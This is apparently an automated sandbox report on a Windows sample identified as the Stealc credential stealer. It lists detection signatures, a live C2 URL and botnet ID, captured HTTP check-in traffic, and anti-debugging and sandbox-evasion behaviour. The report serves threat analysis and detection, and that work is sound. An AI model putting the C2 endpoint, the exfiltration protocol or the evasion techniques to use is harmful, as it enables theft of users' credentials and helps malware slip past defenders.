Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1532751
MD5: 9c8851494e85a86a1b823868d2ec5b1b
SHA1: dbf8f81d9c9bfb1ae8ad0cd1d5bad9a6d0dd41c5
SHA256: 3a69f6d29dee1aec39e1a81e574b7dcebe2e3ee08f2d36117a2bc19d8e279e14
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6500 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9C8851494E85A86A1B823868D2EC5B1B)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara Overview

Dumped Files
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security

Memory Dumps
Source | Rule | Description | Author
00000000.00000002.1735801152.000000000107E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1694461519.0000000004E80000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 6500 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 6500 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Unpacked PEs
Source | Rule | Description | Author
0.2.file.exe.320000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Sigma Overview

No Sigma rule has matched

Suricata Overview

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-13T21:40:06.485545+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.320000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0032C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_0032C820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00327240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_00327240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00329AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_00329AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00329B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_00329B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00338EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_00338EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_003338B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00334910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00334910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0032DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_0032DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0032E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_0032E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0032ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_0032ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00334570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00334570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0032DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0032DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0032BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_0032BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0032F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0032F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00333EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00333EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_003216D0

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CAAAFCAKKKFBFIDGDBFH
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 32 38 38 36 36 38 38 39 32 37 32 30 32 39 37 34 31 31 31 39 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 2d 2d 0d 0a
    Data Ascii:
    ------CAAAFCAKKKFBFIDGDBFH
    Content-Disposition: form-data; name="hwid"

    8C28866889272029741119
    ------CAAAFCAKKKFBFIDGDBFH
    Content-Disposition: form-data; name="build"

    doma
    ------CAAAFCAKKKFBFIDGDBFH--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00324880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_00324880
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CAAAFCAKKKFBFIDGDBFH
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 32 38 38 36 36 38 38 39 32 37 32 30 32 39 37 34 31 31 31 39 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 2d 2d 0d 0a
    Data Ascii:
    ------CAAAFCAKKKFBFIDGDBFH
    Content-Disposition: form-data; name="hwid"

    8C28866889272029741119
    ------CAAAFCAKKKFBFIDGDBFH
    Content-Disposition: form-data; name="build"

    doma
    ------CAAAFCAKKKFBFIDGDBFH--
Source: file.exe, 00000000.00000002.1735801152.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1735801152.000000000107E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1735801152.00000000010D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1735801152.00000000010C6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1735801152.00000000010C6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php%:
Source: file.exe, 00000000.00000002.1735801152.00000000010D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php8a
Source: file.exe, 00000000.00000002.1735801152.000000000107E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpR
Source: file.exe, 00000000.00000002.1735801152.00000000010C6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpu:
Source: file.exe, 00000000.00000002.1735801152.00000000010D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/law
Source: file.exe, 00000000.00000002.1735801152.000000000107E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37W$

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E8033 | 0_2_006E8033
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F2121 | 0_2_006F2121
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006A11FB | 0_2_006A11FB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006ED9D8 | 0_2_006ED9D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E4A8B | 0_2_006E4A8B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005EDB69 | 0_2_005EDB69
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DB3C8 | 0_2_006DB3C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006EA3D9 | 0_2_006EA3D9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006EF579 | 0_2_006EF579
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005BC535 | 0_2_005BC535
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E15FD | 0_2_006E15FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E65B9 | 0_2_006E65B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006EB64A | 0_2_006EB64A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E2FAC | 0_2_006E2FAC
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 003245C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: mmvujlrd ZLIB complexity 0.9949291087962963
Source: file.exe, 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1694461519.0000000004E80000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00339600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00339600
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00333720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00333720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\B7UAUDA7.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1815040 > 1048576
Source: file.exe | Static PE information: Raw size of mmvujlrd is bigger than: 0x100000 < 0x195000

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.320000.0.unpack :EW;.rsrc :W;.idata :W; :EW;mmvujlrd:EW;youucsdu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;mmvujlrd:EW;youucsdu:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00339860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00339860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c0538 should be: 0x1c26bf
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: mmvujlrd
Source: file.exe | Static PE information: section name: youucsdu
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B207A push eax; mov dword ptr [esp], esi | 0_2_007B20DC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00637060 push 4DDBFFD3h; mov dword ptr [esp], edx | 0_2_00637075
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00637060 push 3A0B95B0h; mov dword ptr [esp], ebp | 0_2_00637088
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00637060 push edx; mov dword ptr [esp], ebx | 0_2_006370B2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00637060 push edi; mov dword ptr [esp], 2971E26Dh | 0_2_006370B6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00637060 push 329AB6F7h; mov dword ptr [esp], eax | 0_2_006370F7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00637060 push edx; mov dword ptr [esp], 00000000h | 0_2_00637152
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00637060 push edx; mov dword ptr [esp], 47773F8Ch | 0_2_0063719B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0033B035 push ecx; ret | 0_2_0033B048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00681063 push esi; mov dword ptr [esp], edi | 0_2_0068108D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00681063 push edi; mov dword ptr [esp], ecx | 0_2_00681097
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00681063 push edi; mov dword ptr [esp], ebp | 0_2_0068109B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00681063 push eax; mov dword ptr [esp], 3F6AAD01h | 0_2_0068110B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00681063 push esi; mov dword ptr [esp], ebp | 0_2_0068115C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B486B push edi; mov dword ptr [esp], esi | 0_2_007B489D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CA040 push eax; mov dword ptr [esp], edi | 0_2_005CA04A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CA040 push 4436E718h; mov dword ptr [esp], eax | 0_2_005CA0DB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CA040 push ebx; mov dword ptr [esp], esp | 0_2_005CA0E4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CA040 push 349A3A4Ch; mov dword ptr [esp], eax | 0_2_005CA0F8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A60BF push esi; mov dword ptr [esp], 7FF1584Bh | 0_2_009A60DF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A60BF push esi; mov dword ptr [esp], ecx | 0_2_009A6107
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A60BF push edx; mov dword ptr [esp], eax | 0_2_009A612B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A60BF push 67EC4D53h; mov dword ptr [esp], edx | 0_2_009A6139
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A60BF push 6EE42145h; mov dword ptr [esp], ecx | 0_2_009A6150
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00718847 push esi; mov dword ptr [esp], 7E73EDB5h | 0_2_00718875
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00718847 push edi; mov dword ptr [esp], 77ADE580h | 0_2_007188BC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007CF841 push ecx; mov dword ptr [esp], 7FB4011Bh | 0_2_007CF862
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007CF841 push 3BF652F1h; mov dword ptr [esp], edx | 0_2_007CFEC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E8033 push 6970C3ADh; mov dword ptr [esp], edi | 0_2_006E809D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E8033 push edx; mov dword ptr [esp], esi | 0_2_006E80BE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E8033 push 2790FAC3h; mov dword ptr [esp], eax | 0_2_006E8187
Source: file.exe | Static PE information: section name: mmvujlrd entropy: 7.953824912705421

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00339860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00339860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13298
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6F6019, second address: 6F6035, instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C524B215h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6F633E, second address: 6F6346, instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6F6346, second address: 6F634A, instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6F6492, second address: 6F64CB, instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jng 00007FD3C4756156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jmp 00007FD3C475615Ch 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop edx 0x00000015 jmp 00007FD3C4756162h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jnp 00007FD3C475615Eh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6F64CB, second address: 6F64D5, instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6F64D5, second address: 6F64E1, instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FD3C4756156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6F675E, second address: 6F6789, instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD3C524B206h 0x00000008 jng 00007FD3C524B206h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ebx 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD3C524B20Fh 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6F6789, second address: 6F67CC, instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007FD3C4756156h 0x0000000d pushad 0x0000000e popad 0x0000000f jnc 00007FD3C4756156h 0x00000015 popad 0x00000016 jmp 00007FD3C4756163h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FD3C4756166h 0x00000022 push eax 0x00000023 pop eax 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FA100, second address: 6FA10F, instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD3C524B206h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
